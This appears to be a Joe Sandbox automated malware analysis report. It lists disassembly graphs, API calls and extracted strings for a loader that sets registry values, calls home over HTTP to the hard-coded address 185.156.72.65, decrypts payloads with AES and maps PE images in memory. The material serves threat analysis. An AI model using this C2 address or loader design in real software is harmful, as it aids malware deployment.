557 4059f2-405a0a 554->557 558 4059ca-4059d6 554->558 559 405992-4059a0 555->559 560 4059a6-4059ad call 409b7c 555->560 567 405a34-405a41 call 409a17 557->567 568 405a0c-405a18 557->568 565 4059e8-4059ef call 409b7c 558->565 566 4059d8-4059e6 558->566 559->560 562 405a42-405a47 call 40cfef 559->562 560->554 561->543 563 405300-405389 call 40b570 call 409b8a call 40b570 561->563 586 405390-4053a2 563->586 565->557 566->562 566->565 574 405a2a-405a31 call 409b7c 568->574 575 405a1a-405a28 568->575 574->567 575->562 575->574 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 589 4053fc-4053fe 587->589 590 40540d-405430 587->590 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 592 405400-40540b 589->592 593 405433-405438 590->593 592->590 592->592 593->593 595 40543a-4054dc call 402760 call 409310 593->595 605 4054f1-40550c call 
401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 615 405596-405598 611->615 616 405567-405576 611->616 613 405533-40553a call 409b7c 612->613 614 40551f-40552d 612->614 613->611 614->539 614->613 620 405693-40569c 615->620 621 40559e-4055a5 615->621 618 405578-405586 616->618 619 40558c-405593 call 409b7c 616->619 618->539 618->619 619->615 620->586 625 4056a2 620->625 621->620 622 4055ab-4055b3 621->622 626 4055b9-4055bc 622->626 627 40568d 622->627 629 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 625->629 626->627 630 4055c2-4055ea call 40fb4d 626->630 627->620 658 405807-40580d 629->658 659 4057db-4057e7 629->659 637 4055f0-405602 call 40aff0 630->637 638 4055ec-4055ee 630->638 640 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 637->640 638->640 640->627 662 40565e-405669 call 403430 640->662 660 40583b-405853 658->660 661 40580f-40581b 658->661 663 4057e9-4057f7 659->663 664 4057fd-405804 call 409b7c 659->664 668 405855-405861 660->668 669 40587d-405895 660->669 665 405831-405838 call 409b7c 661->665 666 40581d-40582b 661->666 662->627 680 40566b-405679 call 403430 662->680 663->539 663->664 664->658 665->660 666->539 666->665 673 405873-40587a call 409b7c 668->673 674 405863-405871 668->674 675 405897-4058a3 669->675 676 4058bf-4058dc call 409a17 669->676 673->669 674->539 674->673 682 4058b5-4058bc call 409b7c 675->682 683 4058a5-4058b3 675->683 676->539 680->627 690 40567b-40568b call 403430 680->690 682->676 683->539 683->682 690->627 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 705 405736-405739 702->705 703->702 704->694 706 405768 704->706 
705->704 707 40576a-40576f Sleep 705->707 706->629 707->629
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • Sleep.KERNEL32(000007D0), ref: 00405755
                        • Sleep.KERNEL32(000007D0), ref: 0040576F
                        • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                        • API String ID: 606935701-1501174972
                        • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                        • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                        Control-flow Graph

                        control_flow_graph 1354 4788464-478847d 1355 478847f-4788481 1354->1355 1356 4788488-4788494 CreateToolhelp32Snapshot 1355->1356 1357 4788483 1355->1357 1358 47884a4-47884b1 Module32First 1356->1358 1359 4788496-478849c 1356->1359 1357->1356 1360 47884ba-47884c2 1358->1360 1361 47884b3-47884b4 call 4788123 1358->1361 1359->1358 1364 478849e-47884a2 1359->1364 1365 47884b9 1361->1365 1364->1355 1364->1358 1365->1360
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0478848C
                        • Module32First.KERNEL32(00000000,00000224), ref: 047884AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4780000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFirstModule32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 3833638111-0
                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction ID: 5687d654b8fa294670f3295f60f5c255fd154a4ce1b3eb07731fd8e977f7c2eb
                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction Fuzzy Hash: 55F0F632140715AFE7203FF59C8CB6E72E8FF48325F51052CE646952C0DB74F80546A2

                        Control-flow Graph

                        control_flow_graph 1370 4087e0-408807 call 402460 * 2 call 405a50 1376 40880c-408816 call 4106ab 1370->1376
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: mixtwo$nosub
                        • API String ID: 3472027048-187875987
                        • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                        • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

                        Control-flow Graph

                        APIs
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                          • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                        Strings
                        • http://, xrefs: 00401EF4, 004021D3
                        • text, xrefs: 00401B8F
                        • GET, xrefs: 004020E7
                        • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                        • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                        • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                        • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                        • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                        • API String ID: 2146599340-4172842843
                        • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                        • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

                        Control-flow Graph

                        control_flow_graph 728 493003c-4930047 729 4930049 728->729 730 493004c-4930263 call 4930a3f call 4930e0f call 4930d90 VirtualAlloc 728->730 733 493004a 729->733 746 4930265-4930289 call 4930a69 730->746 747 493028b-4930292 730->747 733->733 752 49302ce-49303c2 VirtualProtect call 4930cce call 4930ce7 746->752 749 49302a1-49302b0 747->749 751 49302b2-49302cc 749->751 749->752 751->749 758 49303d1-49303e0 752->758 759 49303e2-4930437 call 4930ce7 758->759 760 4930439-49304b8 VirtualFree 758->760 759->758 762 49305f4-49305fe 760->762 763 49304be-49304cd 760->763 766 4930604-493060d 762->766 767 493077f-4930789 762->767 765 49304d3-49304dd 763->765 765->762 771 49304e3-4930505 LoadLibraryA 765->771 766->767 772 4930613-4930637 766->772 769 49307a6-49307b0 767->769 770 493078b-49307a3 767->770 773 49307b6-49307cb 769->773 774 493086e-49308be LoadLibraryA 769->774 770->769 775 4930517-4930520 771->775 776 4930507-4930515 771->776 777 493063e-4930648 772->777 778 49307d2-49307d5 773->778 781 49308c7-49308f9 774->781 779 4930526-4930547 775->779 776->779 777->767 780 493064e-493065a 777->780 782 49307d7-49307e0 778->782 783 4930824-4930833 778->783 784 493054d-4930550 779->784 780->767 785 4930660-493066a 780->785 787 4930902-493091d 781->787 788 49308fb-4930901 781->788 789 49307e2 782->789 790 49307e4-4930822 782->790 786 4930839-493083c 783->786 791 49305e0-49305ef 784->791 792 4930556-493056b 784->792 793 493067a-4930689 785->793 786->774 794 493083e-4930847 786->794 788->787 789->783 790->778 791->765 797 493056f-493057a 792->797 798 493056d 792->798 795 4930750-493077a 793->795 796 493068f-49306b2 793->796 801 493084b-493086c 794->801 802 4930849 794->802 795->777 803 49306b4-49306ed 796->803 804 49306ef-49306fc 796->804 799 493059b-49305bb 797->799 800 493057c-4930599 797->800 798->791 812 49305bd-49305db 799->812 800->812 801->786 802->774 803->804 806 493074b 804->806 807 49306fe-4930748 804->807 806->793 807->806 812->784
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0493024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: 08bb6fa7d2181586b89baf2134dc6309017076f57fa03d49e1baa52cb838d437
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: DB528974A00229DFDB64CF58C984BACBBB1BF09305F1480E9E94DAB355DB30AA85DF14

                        Control-flow Graph

                        control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 952 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->952 953 4063af call 407100 862->953 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1019 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1019 1020 4064ae-4064b3 call 4074a0 885->1020 1152 4065c3-4065c8 call 4078c0 918->1152 1153 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1153 966 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->966 967 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->967 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 
call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 952->1016 1022 4063fd-406402 call 407210 952->1022 965 4063b4-4063c7 call 408920 call 402460 953->965 992 40686f-406878 call 4023e0 call 402390 965->992 1031 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 966->1031 1032 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 966->1032 967->1016 992->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1019->1016 1089 4064e9-4064ee call 4075b0 1019->1089 1020->965 1022->965 1031->1016 1098 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1032->1098 1099 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1032->1099 1089->884 1223 40685c-40686c call 4088c0 call 402460 1098->1223 1099->1016 1166 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1099->1166 1152->1153 1153->1016 1210 4065fe-406603 call 4079d0 1153->1210 1166->1223 1210->919 1223->992 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                        • API String ID: 2563648476-311857291
                        • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                        • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                        Control-flow Graph

                        control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1292 402199-4021a0 call 409b7c 1290->1292 1293 402189-402197 1290->1293 1292->1289 1293->1292 1295 4021c8-4021f9 call 40cfef call 401e50 1293->1295
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: http://
                        • API String ID: 0-1121587658
                        • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                        • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

                        Control-flow Graph

                        control_flow_graph 1303 5f69e9-5fa8d9 LoadLibraryA
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: es;o
                        • API String ID: 1029625771-2595528149

Control-flow Graph
• Entry 5f79bf; calls LoadLibraryA (graph image not rendered)
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: es;o
                        • API String ID: 1029625771-2595528149

Control-flow Graph
• Entry 413cb9; calls 40d0dd, RtlAllocateHeap, 412473 and 4116b2 (graph image not rendered)
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 5(@
                        • API String ID: 1279760036-4133491027

Control-flow Graph
• Entry 5f593a; calls RegOpenKeyA (x2) (graph image not rendered)
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FA2E7
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FA30E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0

Control-flow Graph
• Entry 4930e0f; calls SetErrorMode (x2) (graph image not rendered)
                        APIs
                        • SetErrorMode.KERNEL32(00000400,?,?,04930223,?,?), ref: 04930E19
                        • SetErrorMode.KERNEL32(00000000,?,?,04930223,?,?), ref: 04930E1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0

Control-flow Graph
• Entry 6f2834; calls 6f2846, VirtualProtect and 6f27f3 (graph image not rendered)
                        APIs
                        • VirtualProtect.KERNEL32(?), ref: 006F27E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000006F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6f2000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0

Control-flow Graph
• Entry 6f27d0; calls VirtualProtect and 6f27f3 (graph image not rendered)
                        APIs
                        • VirtualProtect.KERNEL32(?), ref: 006F27E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000006F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6f2000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0

Control-flow Graph
• Entry 4788123; calls 4788436, VirtualAlloc and 47881b0 (graph image not rendered)
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04788174
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4780000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        • SetLastError.KERNEL32(0000000D), ref: 00402F02
                        • SetLastError.KERNEL32(000000C1), ref: 00402F44
                        Strings
                        • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                        • DOS header is not valid!, xrefs: 00402F32
                        • Section alignment invalid!, xrefs: 00402FC7
                        • ERROR_OUTOFMEMORY!, xrefs: 00403062
                        • DOS header size is not valid!, xrefs: 00402F71
                        • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                        • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                        • Size is not valid!, xrefs: 00402F08
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast
                        • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                        • API String ID: 1452528299-2436911586
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,8F925C9F), ref: 00403650
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                        • GetLastError.KERNEL32 ref: 004036E8
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                        • GetLastError.KERNEL32 ref: 0040371A
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                        • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049338B7
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049338DB
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04933945
                        • GetLastError.KERNEL32 ref: 0493394F
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04933977
                        • GetLastError.KERNEL32 ref: 04933981
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04933991
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04933A53
                        • CryptDestroyKey.ADVAPI32(?), ref: 04933AC5
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04933893
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                        • LocalFree.KERNEL32(00000000), ref: 00402B62
                        • LocalFree.KERNEL32(?), ref: 00402B67
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                        • String ID: %s: %s$Error protecting memory page
                        • API String ID: 839691724-1484484497
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: "LO)$ATM|$E6{_$Qs$UUw7$W?w$Xi}$Xi}
                        • API String ID: 0-2014852691
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: +K]~$C~k$m>O$p+V$a\$k|$}6D$P+
                        • API String ID: 0-31495350
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
